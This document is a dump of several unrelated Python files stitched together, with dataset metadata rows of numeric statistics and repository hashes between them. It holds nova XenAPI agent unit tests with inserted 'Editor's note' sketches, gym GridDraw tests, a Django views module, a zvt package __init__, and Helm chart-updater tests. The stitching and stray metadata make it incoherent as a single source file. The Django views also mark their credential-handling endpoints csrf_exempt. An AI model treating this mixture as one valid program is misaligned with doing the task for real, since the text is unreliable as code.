        mock_time.return_value = 0
        mock_session = mock.Mock()
        old = 40
        new = 42
        mock_session.VM.get_domid.side_effect = [old, -1, new]

        agent._wait_for_new_dom_id(mock_session, "vm_ref", old, "method")

        mock_session.VM.get_domid.assert_called_with("vm_ref")
        self.assertEqual(3, mock_session.VM.get_domid.call_count)
        self.assertEqual(2, mock_sleep.call_count)

    @mock.patch.object(time, 'sleep')
    @mock.patch.object(time, 'time')
    def test_wait_for_new_dom_id_timeout(self, mock_time, mock_sleep):
        self.flags(agent_timeout=3, group="xenserver")

        def fake_time():
            fake_time.time = fake_time.time + 1
            return fake_time.time

        fake_time.time = 0
        mock_time.side_effect = fake_time
        mock_session = mock.Mock()
        mock_session.VM.get_domid.return_value = "old"

        self.assertRaises(exception.AgentTimeout,
                          agent._wait_for_new_dom_id,
                          mock_session, "vm_ref", "old", "method")

        self.assertEqual(4, mock_session.VM.get_domid.call_count)


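# --- Editor's note (not part of the original module): the retry contract
# pinned down by RebootRetryTestCase above can be summarised by this hedged,
# self-contained sketch -- a plugin call that fails with a "REBOOT:" failure
# is retried exactly once, after waiting for the domain id to change. The
# names below are illustrative, not nova's actual implementation.
def _sketch_call_with_reboot_retry(call_plugin, wait_for_new_dom_id):
    try:
        return call_plugin()
    except Exception as exc:  # nova narrows this to session.XenAPI.Failure
        if "REBOOT:" in str(exc):
            wait_for_new_dom_id()  # block until the VM has a new dom id
            return call_plugin()   # single retry, as the test asserts
        raise

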
class SetAdminPasswordTestCase(AgentTestCaseBase):
    @mock.patch.object(agent.XenAPIBasedAgent, '_call_agent')
    @mock.patch("nova.virt.xenapi.agent.SimpleDH")
    def test_exchange_key_with_agent(self, mock_simple_dh, mock_call_agent):
        agent = self._create_agent(None)
        instance_mock = mock_simple_dh()
        instance_mock.get_public.return_value = 4321
        mock_call_agent.return_value = "1234"

        result = agent._exchange_key_with_agent()

        mock_call_agent.assert_called_once_with('key_init', {"pub": "4321"},
                                                success_codes=['D0'],
                                                ignore_errors=False)
        result.compute_shared.assert_called_once_with(1234)

    @mock.patch.object(agent.XenAPIBasedAgent, '_call_agent')
    @mock.patch.object(agent.XenAPIBasedAgent,
                       '_save_instance_password_if_sshkey_present')
    @mock.patch.object(agent.XenAPIBasedAgent, '_exchange_key_with_agent')
    def test_set_admin_password_works(self, mock_exchange, mock_save,
                                      mock_call_agent):
        mock_dh = mock.Mock(spec_set=agent.SimpleDH)
        mock_dh.encrypt.return_value = "enc_pass"
        mock_exchange.return_value = mock_dh
        agent_inst = self._create_agent(None)

        agent_inst.set_admin_password("new_pass")

        mock_dh.encrypt.assert_called_once_with("new_pass\n")
        mock_call_agent.assert_called_once_with('password',
                                                {'enc_pass': 'enc_pass'})
        mock_save.assert_called_once_with("new_pass")

    @mock.patch.object(agent.XenAPIBasedAgent, '_add_instance_fault')
    @mock.patch.object(agent.XenAPIBasedAgent, '_exchange_key_with_agent')
    def test_set_admin_password_silently_fails(self, mock_exchange,
                                               mock_add_fault):
        error = exception.AgentTimeout(method="fake")
        mock_exchange.side_effect = error
        agent_inst = self._create_agent(None)

        agent_inst.set_admin_password("new_pass")

        mock_add_fault.assert_called_once_with(error, mock.ANY)


class UpgradeRequiredTestCase(test.NoDBTestCase):
    def test_less_than(self):
        self.assertTrue(agent.is_upgrade_required('1.2.3.4', '1.2.3.5'))

    def test_greater_than(self):
        self.assertFalse(agent.is_upgrade_required('1.2.3.5', '1.2.3.4'))

    def test_equal(self):
        self.assertFalse(agent.is_upgrade_required('1.2.3.4', '1.2.3.4'))

    def test_non_lexical(self):
        self.assertFalse(agent.is_upgrade_required('1.2.3.10', '1.2.3.4'))

    def test_length(self):
        self.assertTrue(agent.is_upgrade_required('1.2.3', '1.2.3.4'))


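# --- Editor's note (not part of the original module): the semantics that
# UpgradeRequiredTestCase pins down -- numeric, component-wise comparison in
# which '1.2.3.10' is newer than '1.2.3.4' and a shorter current version
# counts as older -- can be reproduced with plain list comparison. A hedged
# sketch, not nova's implementation:
def _sketch_is_upgrade_required(current_version, available_version):
    current = [int(part) for part in current_version.split(".")]
    available = [int(part) for part in available_version.split(".")]
    # Python compares lists of ints element-wise, and a strict prefix
    # compares as smaller, matching test_length above.
    return current < available

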
@mock.patch.object(uuid, "uuid4")
class CallAgentTestCase(AgentTestCaseBase):
    def test_call_agent_success(self, mock_uuid):
        session = mock.Mock()
        instance = {"uuid": "fake"}
        addl_args = {"foo": "bar"}

        session.VM.get_domid.return_value = '42'
        mock_uuid.return_value = 1
        session.call_plugin.return_value = {'returncode': '4',
                                            'message': "asdf\\r\\n"}

        self.assertEqual("asdf",
                         agent._call_agent(session, instance, "vm_ref",
                                           "method", addl_args, timeout=300,
                                           success_codes=['0', '4']))

        expected_args = {
            'id': '1',
            'dom_id': '42',
            'timeout': '300',
        }
        expected_args.update(addl_args)
        session.VM.get_domid.assert_called_once_with("vm_ref")
        session.call_plugin.assert_called_once_with("agent", "method",
                                                    expected_args)

    def _call_agent_setup(self, session, mock_uuid,
                          returncode='0', success_codes=None,
                          exception=None):
        session.XenAPI.Failure = xenapi_fake.Failure
        instance = {"uuid": "fake"}

        session.VM.get_domid.return_value = 42
        mock_uuid.return_value = 1
        if exception:
            session.call_plugin.side_effect = exception
        else:
            session.call_plugin.return_value = {'returncode': returncode,
                                                'message': "asdf\\r\\n"}

        return agent._call_agent(session, instance, "vm_ref", "method",
                                 success_codes=success_codes)

    def _assert_agent_called(self, session, mock_uuid):
        expected_args = {
            'id': '1',
            'dom_id': '42',
            'timeout': '30',
        }
        session.call_plugin.assert_called_once_with("agent", "method",
                                                    expected_args)
        session.VM.get_domid.assert_called_once_with("vm_ref")

    def test_call_agent_works_with_defaults(self, mock_uuid):
        session = mock.Mock()
        self._call_agent_setup(session, mock_uuid)
        self._assert_agent_called(session, mock_uuid)

    def test_call_agent_fails_with_timeout(self, mock_uuid):
        session = mock.Mock()
        self.assertRaises(exception.AgentTimeout, self._call_agent_setup,
                          session, mock_uuid,
                          exception=xenapi_fake.Failure(["TIMEOUT:fake"]))
        self._assert_agent_called(session, mock_uuid)

    def test_call_agent_fails_with_not_implemented(self, mock_uuid):
        session = mock.Mock()
        self.assertRaises(exception.AgentNotImplemented,
                          self._call_agent_setup,
                          session, mock_uuid,
                          exception=xenapi_fake.Failure(["NOT IMPLEMENTED:"]))
        self._assert_agent_called(session, mock_uuid)

    def test_call_agent_fails_with_other_error(self, mock_uuid):
        session = mock.Mock()
        self.assertRaises(exception.AgentError, self._call_agent_setup,
                          session, mock_uuid,
                          exception=xenapi_fake.Failure(["asdf"]))
        self._assert_agent_called(session, mock_uuid)

    def test_call_agent_fails_with_returned_error(self, mock_uuid):
        session = mock.Mock()
        self.assertRaises(exception.AgentError, self._call_agent_setup,
                          session, mock_uuid, returncode='42')
        self._assert_agent_called(session, mock_uuid)


class XenAPIBasedAgent(AgentTestCaseBase):
    @mock.patch.object(agent.XenAPIBasedAgent, "_add_instance_fault")
    @mock.patch.object(agent, "_call_agent")
    def test_call_agent_swallows_error(self, mock_call_agent,
                                       mock_add_instance_fault):
        fake_error = exception.AgentError(method="bob")
        mock_call_agent.side_effect = fake_error

        instance = _get_fake_instance()
        agent = self._create_agent(instance)

        agent._call_agent("bob")

        mock_call_agent.assert_called_once_with(agent.session, agent.instance,
                                                agent.vm_ref, "bob", None,
                                                None, None)
        mock_add_instance_fault.assert_called_once_with(fake_error, mock.ANY)

    @mock.patch.object(agent.XenAPIBasedAgent, "_add_instance_fault")
    @mock.patch.object(agent, "_call_agent")
    def test_call_agent_throws_error(self, mock_call_agent,
                                     mock_add_instance_fault):
        fake_error = exception.AgentError(method="bob")
        mock_call_agent.side_effect = fake_error

        instance = _get_fake_instance()
        agent = self._create_agent(instance)

        self.assertRaises(exception.AgentError, agent._call_agent,
                          "bob", ignore_errors=False)

        mock_call_agent.assert_called_once_with(agent.session, agent.instance,
                                                agent.vm_ref, "bob", None,
                                                None, None)
        self.assertFalse(mock_add_instance_fault.called)
end_unit
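# --- Editor's note (not part of the original module): _get_fake_instance
# above stores system metadata as a list of {"key": ..., "value": ...} dicts,
# which is the shape the agent's sys-meta lookups iterate over. A hedged,
# standalone illustration (the helper name is hypothetical):
def _sketch_lookup_sys_meta(instance, key):
    # Scan the key/value records and return the value, or None if missing.
    for item in instance.get("system_metadata", []):
        if item["key"] == key:
            return item["value"]
    return None

assert _sketch_lookup_sys_meta(
    {"system_metadata": [{"key": "os_type", "value": "asdf"}]},
    "os_type") == "asdf"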
| 12.709096 | 88 | 0.616693 | 6,202 | 41,635 | 3.977749 | 0.046759 | 0.164167 | 0.096879 | 0.056425 | 0.886745 | 0.838549 | 0.791407 | 0.75148 | 0.700932 | 0.652655 | 0 | 0.003736 | 0.093623 | 41,635 | 3,275 | 89 | 12.712977 | 0.649999 | 0 | 0 | 0.939237 | 0 | 0 | 0.361307 | 0.056971 | 0 | 0 | 0 | 0 | 0.018015 | 0 | null | null | 0.005191 | 0.002443 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e51c98186bb9c05942c18c0c34283865a5a26cd6 | 634 | py | Python | tests/test.py | te95/grid_draw | d44059daa412f57aa8699f56fd75b9fe5682d715 | ["MIT"] | 1 | 2019-11-04T12:49:42.000Z | 2019-11-04T12:49:42.000Z | tests/test.py | tedai/grid_draw | d44059daa412f57aa8699f56fd75b9fe5682d715 | ["MIT"] | null | null | null | tests/test.py | tedai/grid_draw | d44059daa412f57aa8699f56fd75b9fe5682d715 | ["MIT"] | null | null | null |
import unittest

import gym
import grid_draw


class Environment(unittest.TestCase):
    def test_bw_env_make(self):
        gym.make("GridDrawBw-v0")

    def test_bw_env_reset(self):
        env = gym.make("GridDrawBw-v0")
        env.reset()

    def test_bw_env_step(self):
        env = gym.make("GridDrawBw-v0")
        env.reset()
        env.step(0)

    def test_rgb_env_make(self):
        gym.make("GridDrawBw-v0")

    def test_rgb_env_reset(self):
        env = gym.make("GridDrawBw-v0")
        env.reset()

    def test_rgb_env_step(self):
        env = gym.make("GridDrawBw-v0")
        env.reset()
        env.step(0)
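# --- Editor's note (not part of the original file): the tests above only
# exercise make/reset/step. A minimal episode loop over the same env id,
# sketched under the classic gym step API that the tests imply:
import gym
import grid_draw  # noqa: F401 -- importing registers the GridDraw envs

env = gym.make("GridDrawBw-v0")
obs = env.reset()
done = False
while not done:
    # Sample a random action; step returns the classic 4-tuple.
    obs, reward, done, info = env.step(env.action_space.sample())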
| 21.133333 | 39 | 0.61041 | 89 | 634 | 4.134831 | 0.224719 | 0.11413 | 0.277174 | 0.309783 | 0.733696 | 0.733696 | 0.733696 | 0.733696 | 0.733696 | 0.532609 | 0 | 0.017131 | 0.263407 | 634 | 29 | 40 | 21.862069 | 0.770878 | 0 | 0 | 0.545455 | 0 | 0 | 0.123028 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.136364 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e548415d9ec6c95ca0075fb9e2e8e7268f4861e1 | 3,604 | py | Python | blobdatabase/views.py | esriis/djangoapp | e9e7efa1b0b98cb9f3d2a3b39b22d011c64af884 | ["MIT"] | null | null | null | blobdatabase/views.py | esriis/djangoapp | e9e7efa1b0b98cb9f3d2a3b39b22d011c64af884 | ["MIT"] | null | null | null | blobdatabase/views.py | esriis/djangoapp | e9e7efa1b0b98cb9f3d2a3b39b22d011c64af884 | ["MIT"] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
from functions.tableService import uploadTable, deleteTable, writeTable
from django.contrib.auth import authenticate, login, logout
from django.views.decorators.csrf import csrf_exempt
from pathlib import Path
# from .forms import UploadFileForm


def index(request):
    return HttpResponse("Hello, world. You're at the blobdatabase index.")


@csrf_exempt
def download_view(request):
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            response = writeTable()
            logout(request)
            return response
        else:
            return HttpResponse("Login unsuccessful.")
    else:
        return HttpResponse("Login details required.")


@csrf_exempt
def upload_view(request):
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            response = uploadTable(request.FILES['file'], decode=True)
            logout(request)
            return HttpResponse(response)
        else:
            return HttpResponse("Login unsuccessful.")
    else:
        return HttpResponse("Requires POST")


@csrf_exempt
def delete_view(request):
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            response = deleteTable(request.FILES['file'], decode=True)
            logout(request)
            return HttpResponse(response)
        else:
            return HttpResponse("Login unsuccessful.")
    else:
        return HttpResponse("Requires POST")


@csrf_exempt
def deleteFTP_view(request):
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            path = "tables/deleteTable.csv"
            if Path(path).is_file():
                response = deleteTable(open(path, encoding='utf-8-sig'))
                Path(path).unlink()
            else:
                response = "File not found."
            logout(request)
            return HttpResponse(response)
        else:
            return HttpResponse("Login unsuccessful.")
    else:
        return HttpResponse("Requires POST")


@csrf_exempt
def uploadFTP_view(request):
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        user = authenticate(request, username=username, password=password)
        if user is not None:
            login(request, user)
            path = "tables/uploadTable.csv"
            if Path(path).is_file():
                response = uploadTable(open(path, encoding='utf-8-sig'))
                Path(path).unlink()
            else:
                response = "File not found."
            logout(request)
            return HttpResponse(response)
        else:
            return HttpResponse("Login unsuccessful.")
    else:
        return HttpResponse("Requires POST")
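# --- Editor's note (not part of the original file): a hedged client-side
# sketch of how one of the CSRF-exempt views above could be exercised. The
# route, host, credentials, and file name are all placeholders, not values
# taken from this project's urlconf.
import requests

with open("table.csv", "rb") as fh:
    resp = requests.post(
        "http://localhost:8000/blobdatabase/upload/",  # hypothetical route
        data={"username": "user", "password": "secret"},
        files={"file": fh},
    )
print(resp.status_code, resp.text)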
| 33.06422 | 74 | 0.613485 | 360 | 3,604 | 6.105556 | 0.194444 | 0.122839 | 0.100091 | 0.073703 | 0.763421 | 0.763421 | 0.763421 | 0.738854 | 0.738854 | 0.707461 | 0 | 0.00078 | 0.288568 | 3,604 | 108 | 75 | 33.37037 | 0.856474 | 0.009156 | 0 | 0.763441 | 0 | 0 | 0.116839 | 0.012328 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0.107527 | 0.064516 | 0.010753 | 0.290323 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
e582bb58479bd487bff384f35679044522a14b2a | 278 | py | Python | zvt/recorders/__init__.py | webclinic017/FinanceCenter | 1511751fe6d7d1f1fb940ae66d29b45eb0782fea | ["MIT"] | 22 | 2020-10-22T14:24:32.000Z | 2022-03-30T22:19:14.000Z | zvt/recorders/__init__.py | webclinic017/FinanceCenter | 1511751fe6d7d1f1fb940ae66d29b45eb0782fea | ["MIT"] | 1 | 2021-08-14T12:19:18.000Z | 2021-09-30T06:44:04.000Z | zvt/recorders/__init__.py | webclinic017/FinanceCenter | 1511751fe6d7d1f1fb940ae66d29b45eb0782fea | ["MIT"] | 6 | 2021-01-14T20:50:06.000Z | 2022-01-11T23:12:43.000Z |
# -*- coding: utf-8 -*-
from zvt.recorders.hardcode import *
from zvt.recorders.eastmoney import *
from zvt.recorders.exchange import *
from zvt.recorders.joinquant import *
from zvt.recorders.sina import *
from zvt.recorders.baostock import *
from zvt.recorders.yahoo import *
| 30.888889 | 37 | 0.773381 | 38 | 278 | 5.657895 | 0.368421 | 0.227907 | 0.52093 | 0.613953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004082 | 0.118705 | 278 | 8 | 38 | 34.75 | 0.873469 | 0.07554 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e5b4bf9ec9ed8b69d742d858d9cf856853f023d4 | 14,529 | py | Python | tests/test_chart_sync.py | rossumai/chart-updater | ebc649a0567ce6aba2f22186753652d25c83fc72 | ["Apache-2.0"] | 5 | 2020-03-09T10:33:36.000Z | 2022-03-04T16:49:37.000Z | tests/test_chart_sync.py | rossumai/chart-updater | ebc649a0567ce6aba2f22186753652d25c83fc72 | ["Apache-2.0"] | 4 | 2020-05-11T13:06:09.000Z | 2022-02-15T14:51:59.000Z | tests/test_chart_sync.py | rossumai/chart-updater | ebc649a0567ce6aba2f22186753652d25c83fc72 | ["Apache-2.0"] | 1 | 2021-11-10T20:20:13.000Z | 2021-11-10T20:20:13.000Z |
import re
from os import mkdir
from subprocess import PIPE, run

from chart_updater.git import Git
from chart_updater.helm_repo import HelmRepo
from chart_updater.updater import Updater

MANIFEST_PATH = "helmrelease.yaml"

MANIFEST_WITHOUT_ANNOTATION = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    fluxcd.io/automated: "true"
spec:
  chart:
  values:
"""

MANIFEST_WITHOUT_CHART_VERSION_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
spec:
  chart:
  values:
"""

MANIFEST_WITH_SEMVER_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: semver:1.2.x
spec:
  chart:
    name: hello-world
    version: 1.2.3
  values:
"""

UPDATED_MANIFEST_WITH_SEMVER_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: semver:1.2.x
spec:
  chart:
    name: hello-world
    version: 1.2.4
  values:
"""

MANIFEST_WITH_GLOB_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
spec:
  chart:
    name: hello-world
    version: 1.2.3
  values:
"""

UPDATED_MANIFEST_WITH_GLOB_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
spec:
  chart:
    name: hello-world
    version: 1.2.4
  values:
"""

MANIFEST_WITH_REGEX_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: regex:1\\.2\\..*
spec:
  chart:
    name: hello-world
    version: 1.2.3
  values:
"""

UPDATED_MANIFEST_WITH_REGEX_PATTERN = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: regex:1\\.2\\..*
spec:
  chart:
    name: hello-world
    version: 1.2.4
  values:
"""

CHART_REPO_INDEX_WITH_ANOTHER_CHART = """
apiVersion: v1
entries:
  cert-manager:
  - version: 0.11.0
    created: "2019-10-10T13:57:16.097Z"
    appVersion: v0.11.0
"""

CHART_REPO_INDEX_WITH_OLD_CHARTS = """
apiVersion: v1
entries:
  hello-world:
  - version: 0.0.1
    created: "2019-10-10T10:00:00.000Z"
    appVersion: v0.11.0
  - version: 0.0.2
    created: "2019-10-10T13:00:00.000Z"
    appVersion: v0.11.1
"""

CHART_REPO_INDEX_WITH_NEW_CHARTS = """
apiVersion: v1
entries:
  hello-world:
  - version: 1.2.3
    created: "2020-01-02T13:57:16.097Z"
    appVersion: v10.11.12
  - version: 1.2.4
    created: "2020-01-03T13:57:16.097Z"
    appVersion: v10.11.15
  - version: 1.0.0
    created: "2020-01-01T13:57:16.097Z"
    appVersion: v10.11.10
"""

MANIFEST_WITH_SINGLE_IMAGE = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
    rossum.ai/update-image.chart-image: "true"
spec:
  chart:
    name: hello-world
    version: 1.2.3
  values:
    image:
      tag: v0.0.1"""

UPDATED_MANIFEST_WITH_SINGLE_IMAGE = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
    rossum.ai/update-image.chart-image: "true"
spec:
  chart:
    name: hello-world
    version: 1.2.4
  values:
    image:
      tag: v10.11.15
"""

MANIFEST_WITH_MULTIPLE_IMAGES = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
    rossum.ai/update-image.chart-image: "true"
    rossum.ai/update-image.other: "true"
spec:
  chart:
    name: hello-world
    version: 1.2.3
  values:
    image:
      tag: v0.0.1
    other:
      image:
        tag: v0.0.1
"""

UPDATED_MANIFEST_WITH_MULTIPLE_IMAGES = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
    rossum.ai/update-image.chart-image: "true"
    rossum.ai/update-image.other: "true"
spec:
  chart:
    name: hello-world
    version: 1.2.4
  values:
    image:
      tag: v10.11.15
    other:
      image:
        tag: v10.11.15
"""

MANIFEST_WITH_MULTIPLE_DOCUMENTS = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
spec:
  chart:
    name: hello-world
    version: 1.2.3
---
kind: HelmRelease
metadata:
  name: hello-world2
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
spec:
  chart:
    name: hello-world2
    version: 1.2.3
"""

MANIFEST_EMPTY = """# HelmRelease
# rossum.ai/
---
"""

MANIFEST_WITH_FLUX2 = """apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
spec:
  chart:
    spec:
      chart: hello-world
      version: 1.2.3
      sourceRef:
        kind: HelmRepository
        name: test
        namespace: flux-system
  values:
"""

UPDATED_MANIFEST_WITH_FLUX2 = """apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/chart-auto-update: "true"
    rossum.ai/chart-version: glob:1.2.*
spec:
  chart:
    spec:
      chart: hello-world
      version: 1.2.4
      sourceRef:
        kind: HelmRepository
        name: test
        namespace: flux-system
  values:
"""

MANIFEST_NO_RELEVANT_ANNOTATIONS = """apiVersion: helm.fluxcd.io/v1
kind: HelmRelease
metadata:
  name: hello-world
  namespace: default
  annotations:
    rossum.ai/something: bar
spec:
  chart:
    name: hello-world
    version: 1.2.3
"""

INITIAL_COMMIT_RE = re.compile(r"Init")
CHART_RELEASE_COMMIT_RE = re.compile(
    r"Release of hello-world 1.2.4.*\+\s+version:\s+1.2.4", flags=re.DOTALL
)
SINGLE_IMAGE_RELEASE_COMMIT_RE = re.compile(
    r"Release of hello-world 1.2.4.*tag:\s+v10.11.15", flags=re.DOTALL
)
MULTIPLE_IMAGES_RELEASE_COMMIT_RE = re.compile(
    r"Release of hello-world 1.2.4.*tag:\s+v10.11.15.*tag:\s+v10.11.15", flags=re.DOTALL
)
HELM_REPO_URL = "mock://some.url"
HELM_REPO_INDEX = f"{HELM_REPO_URL}/index.yaml"


def test_no_annotation(empty_git_repo):
    _add_manifest(MANIFEST_WITHOUT_ANNOTATION)
    _init_commit()
    updater = Updater(Git(empty_git_repo), HelmRepo("mock://"))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == MANIFEST_WITHOUT_ANNOTATION
    assert re.search(INITIAL_COMMIT_RE, _last_commit())


def test_no_chart_tag(empty_git_repo):
    _add_manifest(MANIFEST_WITHOUT_CHART_VERSION_PATTERN)
    _init_commit()
    updater = Updater(Git(empty_git_repo), HelmRepo("mock://"))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == MANIFEST_WITHOUT_CHART_VERSION_PATTERN
    assert re.search(INITIAL_COMMIT_RE, _last_commit())


def test_no_chart_in_helm_repository(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_GLOB_PATTERN)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_ANOTHER_CHART)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == MANIFEST_WITH_GLOB_PATTERN
    assert re.search(INITIAL_COMMIT_RE, _last_commit())


def test_no_new_chart(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_GLOB_PATTERN)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_OLD_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == MANIFEST_WITH_GLOB_PATTERN
    assert re.search(INITIAL_COMMIT_RE, _last_commit())


def test_chart_updated_semver(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_SEMVER_PATTERN)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == UPDATED_MANIFEST_WITH_SEMVER_PATTERN
    assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())


def test_chart_updated_glob(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_GLOB_PATTERN)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == UPDATED_MANIFEST_WITH_GLOB_PATTERN
    assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())


def test_chart_updated_regex(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_REGEX_PATTERN)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == UPDATED_MANIFEST_WITH_REGEX_PATTERN
    assert re.search(CHART_RELEASE_COMMIT_RE, _last_commit())


def test_default_image_updated(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_SINGLE_IMAGE)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == UPDATED_MANIFEST_WITH_SINGLE_IMAGE
    assert re.search(SINGLE_IMAGE_RELEASE_COMMIT_RE, _last_commit())


def test_multiple_images_updated(empty_git_repo, requests_mock):
    _add_manifest(MANIFEST_WITH_MULTIPLE_IMAGES)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == UPDATED_MANIFEST_WITH_MULTIPLE_IMAGES
    assert re.search(MULTIPLE_IMAGES_RELEASE_COMMIT_RE, _last_commit())


def test_chart_not_updated_manifest_outside_of_path(empty_git_repo, requests_mock):
    mkdir("deploy")
    _add_manifest(MANIFEST_WITH_GLOB_PATTERN)
    _init_commit()
    requests_mock.get(HELM_REPO_INDEX, text=CHART_REPO_INDEX_WITH_NEW_CHARTS)
    updater = Updater(Git(empty_git_repo, git_path="deploy/"), HelmRepo(HELM_REPO_URL))
    updater.update_loop(one_shot=True)
    assert _get_manifest() == MANIFEST_WITH_GLOB_PATTERN
